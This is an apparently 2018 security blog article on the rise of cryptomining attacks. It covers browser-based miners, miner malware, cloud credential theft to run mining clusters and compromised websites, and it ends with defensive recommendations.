Crypto mining attacks explode in 2018 with no end in sight
Cryptomining malware attacks increase towards 50% of organizations hit globally
Cryptomining attacks are the top cyber threat of 2018; they are costing companies hundreds of thousands of dollars, and will continue to grow as the malware used in the attacks spreads and cryptocurrency values rise
The steep rise in the price of Bitcoin in 2017 brought with it new cyberattacks to take advantage of this untraceable cryptocurrency. Widespread ransomware attacks like WannaCry and NotPetya cost companies millions around the globe. Now, criminals are increasingly turning to a new style of attack to harvest cryptocurrency from unsuspecting victims: cryptomining attacks.
Beginnings of Cryptomining Attacks
Large scan cryptomining attacks began in September 2017, when Coinhive introduced a JavaScript miner that enabled cryptocurrency mining within a browser. Criminals immediately began attacks on vulnerable browsers and unsuspecting victims to draw visitors to illicit websites and leverage their machines for cryptomining. According to security firm Malwarebytes, illicit cryptocurrency mining is now the top cyber-criminal activity, and security firm Imperva reported seeing cryptomining in 90% of all remote code execution attacks. Cryptomining modules are increasingly included in malicious spam attachments, drive-by download attacks, and malicious mobile apps. Comodo Cybersecurity Threat Research Labs named cryptominer-based attacks to be the top malware threat in 2018 – detecting 28.9 million cryptominer incidents in Q1 2018.
Cryptomining and Cryptocurrency – Bitcoin Mining and More
Cryptocurrencies, Bitcoin included, are digital currencies secured using cryptography. They are not created or controlled by a government, but instead by a computer program or algorithm that determines how new currency is found and released and how transactions are made. Transactions are made between individuals, without using banks, and recorded on a public record – the infamous blockchain. A large driver for early adoption of Bitcoin was for illicit transactions via the Silk Road – a dark web marketplace like a criminal eBay that sold drugs, weapons, and other contraband and used Bitcoin to remain untraceable. While Bitcoin was created in 2009 by Satoshi Nakamoto, cryptocurrency really became popular in 2017, when it rose in value from $900 to nearly $20,000.
Where do Bitcoins Come From?
Instead of a central bank releasing more money into circulation like with the USD, cryptocurrency increases circulation through the release of cryptocoins to the ‘miners’ who lend computing power to drive the encryption requirements of maintaining the block chain. Miners verify the transactions that are continually added to the block chain, and are rewarded with a payment in cryptocoin. By stealing processing power to solve these complex calculations, cyber criminals can effectively use victim computers to mine cryptocurrency; often without the victim’s knowledge. According to a recent Check Point investigation, Bitcoin commits a new block of transactions every 10 minutes to its ledger and awards 12.5 bitcoins to its miner, equating to about $130,000 every 10 minutes or $6.8 billion annually. Although many attacks do use Bitcoin, many are now moving to Monero. Bitcoin wallets can be blocked or blacklisted and transactions tracked – but Monero cannot be tracked, blacklisted, or traced to a specific person.
The Rise of Cryptomining Attacks
With the huge increase in the value of Bitcoin came a surge in cyber-attacks using it to extract payment from victims. Criminals targeted Bitcoin and other cryptocurrencies due to their anonymity and decentralized system.
According to a recent NullTX report, 97% of dark web illicit activity has been conducted through Bitcoin. While ransomware has notably used cryptocurrencies as a means to extract ransoms from victims, cryptomining is a new way for criminals to steal from victims. By exploiting vulnerabilities or website visits from victims, criminals are able to steal processing power of unsuspecting victims to directly mine cryptocurrency.
Types of Cryptomining Attacks
Cryptomining attacks are a growing threat to businesses and organizations globally. They fall into two categories – malicious downloads and websites hosting cryptomining scripts that run on the visitor’s system.
Cryptomining Malware
While attackers previously might have targeted sensitive data after a breach, they are now targeting computing power itself. Check Point’s monthly malware report found earlier this year that three of the top four malware types spotted by the security firm were miners – Cryptoloot, JSEcoin, and Coinhive, with the fourth RigEK being used to distribute miners. Attackers install these malicious miners by targeting vulnerabilities and including them in phishing attacks. Malicious miners are not limited to computers – during attacks on mobile phones through malicious apps, phones can even overheat and melt.
Insider attacks are also common – In another example, a European bank experienced unusual traffic on its servers, suffering slow processing overnight. Darktrace reported finding that an employee had set up a cryptomining system under the floorboards, programmed to run covertly at night.
Cloud Computing and Cryptomining Attacks Cost Big
Cryptomining malware can be particularly costly when the malicious miners are installed after an attacker has gained access to a target system. Earlier this year, RedLock Cloud Security Intelligence reported that attackers had gained access to Tesla’s cloud environment, leveraging an Kubernetes console that was not password protected in order to steal AWS credentials and spin up a cryptomining cluster of computers. The RedLock report detailed how criminals regularly stole credentials to a company’s AWS, Azure, or other cloud computing provider. Criminals then could start up new compute instances to use for mining, which added up to a hefty bill for the victim before they were detected. In an elastic cloud, the environment auto-scales, spawning additional instances to support mining operations and adding to cloud hosting costs.
Clickjacking Cryptominers
In some cases, attackers have compromised corporate websites, embedding mining JavaScript in the site’s HTML pages. Website visitors then load the malicious JavaScript and become miners themselves, which may damage the company’s reputation and result in poor customer experience, especially after the negative publicity surrounding the discovery of such attacks. This pattern has affected more than 4000 websites according to a recent ICO Report.
How to Prevent Cryptomining Attacks
Several key defensive methods are needed to prevent this new attack method:
- Incorporate cryptomining attacks into security awareness training – many cryptomining attacks begin with an attack on the user – via drive-by-download, phishing emails, or clickjacking on malicious websites. Employee training helps potential victims to avoid malicious websites and realize the threat posed by these new attack methods.
- Install anti-cryptomining extensions on web browsers – cryptomining attackers utilize java-based browser attacks. Extensions like No Coin and MinerBlock are designed to detect and block these cryptomining scripts and protect unwitting victims. Organizations can also restrict the allowed browser extensions, preventing users from unwittingly installing poisoned extensions or malicious extensions that execute cryptomining scripts.
- Implement robust vulnerability management – many endpoint protection solutions have now added cryptominer detection, recognizing the heavy processor load that miners use to detect and block malicious processes. By conducting regular vulnerability assessments, organizations can identify vulnerabilities that malicious attackers might use to install cryptomining malware on their systems, or malicious scripts on their website.
Conclusion
Cryptomining in the browser works when embedded JavaScript on a website can leverage a visiting device’s processing power to mine cryptocurrency. Cryptomining malware works by installing a miner on the target system by exploiting a vulnerability or tricking the user to install the malicious miner (usually via phishing). Since these attacks are very successful and profitable for criminals, their use is likely to continue. Organizations have many options available to mitigate this new risk, with a strong vulnerability management program the most important method to identify and mitigate cyber threats.
Starting with a vulnerability scan or penetration test will, at the very uncover known vulnerabilities that can be exploited by cryptomining malware. One glaring difference between attack methods for cryptomining and a typical attack targeting sensitive data is that the attacker does not care which system he compromises in many cases. Thus, in this case both high and low value assets need to be protected.